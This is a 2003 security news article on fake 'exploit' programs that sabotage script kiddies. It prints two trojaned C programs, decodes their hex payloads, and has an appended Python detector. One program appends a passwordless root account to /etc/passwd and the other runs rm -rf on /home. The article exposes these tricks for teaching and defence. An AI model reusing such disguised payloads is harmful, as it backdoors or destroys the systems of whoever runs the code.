Rootsecure.net
The Security News Site For Systems Administrators & Hackers
Reports | Hackers Hack 'Script Kiddies'
{3rd May 2003}
Script kiddies, those who typically use existing, well-known exploits to gain unauthorized access to computer systems with little regard for the actual code and how it works, be warned: examine what you execute.

Most people realise, or quickly find out, that downloading '31337 hax40r too1z' from sites on free web space is generally not such a good idea, since more likely than not these programmes come with often destructive extras. Now, however, those who blindly run code hoping to, say, deface yet another supposedly vulnerable web server have another problem to consider besides hiding their identity. Does the code they downloaded really do what it says, or is it a convincing fake which actually adds, say, a new root account with no password to the local system?

The practice of producing such 'exploit' code is certainly not widespread; it does, however, happen:

--- /*
Remote apache 2.0.45 root exploit (linux)

Some code taken from a old apache 1.3* expliot, author unknown.
Updated and fixed by WhiteRaven of Hackerhost.com

Due to the nature of the expliot you must be root
on the local box for this to work.

to compile:
gcc apache.c -o apache
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;

if (argc != 2){
printf("Apache 2.0.45 Remote Expliot by WhiteRaven");
printf("%s <target>\n", argv[0]);
exit(1);
}

buffer = (char *)malloc(BSIZE + ASIZE + 100);

if (buffer == NULL) {
printf("Not enough memory! Exiting.\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '\0'; /* the character literal here was lost in the original posting; a terminating NUL is assumed */

hp = gethostbyname(argv[1]);

if (hp == NULL) {
printf("No such target server. Exiting.\n");
exit(1);
}

bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80); /* Port 80 is HTTP */
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (s < 0) {
printf("Can't open socket, Exiting.\n");
exit(1);
}

if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused.\nIs the target running a webserver?\nExiting.\n");
exit(1);
}

printf("Sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1){
printf("exploit was successful!\n");
}else{
printf("Sorry, This target isn't vulnerable\n");
}

printf("Waiting for shell.....\n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);
else
wait(NULL);
while(1){
/* shell */
}
return 0;
}

--- /*
Proof of concept code!!
DO NOT DISTRIBUTE!

d4yj4y_at_yahoo.com

Get r00t on any Linux x86 system
With the below shellcode.

It uses an exploit in the linux
kernel to elevate privilages to root!
*/

char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";

main()
{
system(shellcode);
return 0;
}

Anyone running the above code purporting to be a zero-day "Remote apache 2.0.45 root exploit" would find an extra root account on their system under the name rav3n with no password. Decoding the hex characters (65 63 68 6f 20 72 61 76 33 6e 3a 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 20 3e 3e 20 2f 65 74 63 2f 70 61 73 73 77 64) to ASCII reveals the command "echo rav3n::0:0::/:/bin/sh >> /etc/passwd", and translating the "Get r00t on any Linux x86 system" code shows "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe".
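Decoding the escaped bytes by hand is exactly the check the article asks for. As an added example (not code from the article or from either quoted posting), this Python script pulls every `char name[] = "..." "...";` array out of C source, unescapes it, and flags arrays whose decoded bytes are entirely printable text (genuine machine code never is) and which are handed to `system()` or an `exec*()` call. The sample input embeds the two arrays quoted above plus one constructed array of non-text bytes for contrast; the indicator list is a hypothetical starting point, not an exhaustive one.

```python
import re
# Constructed sample: the two arrays quoted in the posting above, the calls that run
# them, and one constructed array of non-text bytes for contrast.
SAMPLE_SOURCE = r'''
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
execl("/bin/sh", "sh", "-c", shellcode, 0);
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";
system(shellcode);
char binary_blob[] = "\x01\x02\xfe\xff";   /* constructed: not text */
'''

DECL_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*\\?\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
LIT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)   # each literal inside a declaration
INDICATORS = ("/etc/passwd", "/etc/shadow", "::0:0", "rm -rf", ">>", "/bin/sh")  # hypothetical list
SIMPLE_ESC = {"n": "\n", "t": "\t", "r": "\r", "0": "\0", "\\": "\\", '"': '"', "'": "'"}

def unescape_c(literal: str) -> str:
    """Decode the body of a C string literal; handles \\xHH and the common one-letter escapes."""
    def sub(m):
        esc = m.group(1)
        return chr(int(esc[1:], 16)) if esc[0] == "x" else SIMPLE_ESC.get(esc, esc)
    return re.sub(r"\\(x[0-9A-Fa-f]{1,2}|.)", sub, literal, flags=re.S)

def decode_char_arrays(source: str) -> list[tuple[str, str]]:
    """Every `char name[] = "..." "...";` in source, decoded, in order of appearance."""
    return [(name, "".join(unescape_c(body) for body in LIT_RE.findall(lits)))
            for name, lits in DECL_RE.findall(source)]

def audit_shellcode(source: str) -> list[dict]:
    """Flag 'shellcode' that is really a shell command: all-printable text handed to a shell."""
    findings = []
    for name, text in decode_char_arrays(source):
        runner = re.compile(r"\b(?:system|popen|execl|execlp|execv|execvp)\s*\([^;]*\b%s\b" % re.escape(name))
        findings.append({"name": name, "decoded": text,
                         "all_printable": text.isascii() and text.isprintable(),
                         "passed_to_shell": runner.search(source) is not None,
                         "indicators": [i for i in INDICATORS if i in text]})
    return findings

if __name__ == "__main__":
    for f in audit_shellcode(SAMPLE_SOURCE):
        verdict = "shell command, not shellcode" if f["all_printable"] and f["passed_to_shell"] else "binary"
        print(f"{f['name']}: {f['decoded']!r} -> {verdict} {f['indicators']}")
```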

Programs such as these, written by 'hackers' who are increasingly frustrated with those who give them a bad name in the eyes of the media (by mindlessly attacking machines with the intent of causing damage), reopen the long-running debate on whether systems administrators should have the right to disable machines attacking their networks, this time by proactive rather than reactive means.

It should be noted that the code is written in the hope that legitimate security professionals would not run exploit code written in any language of which they do not have at least a basic understanding; otherwise the security profession will find itself coming under even greater attack.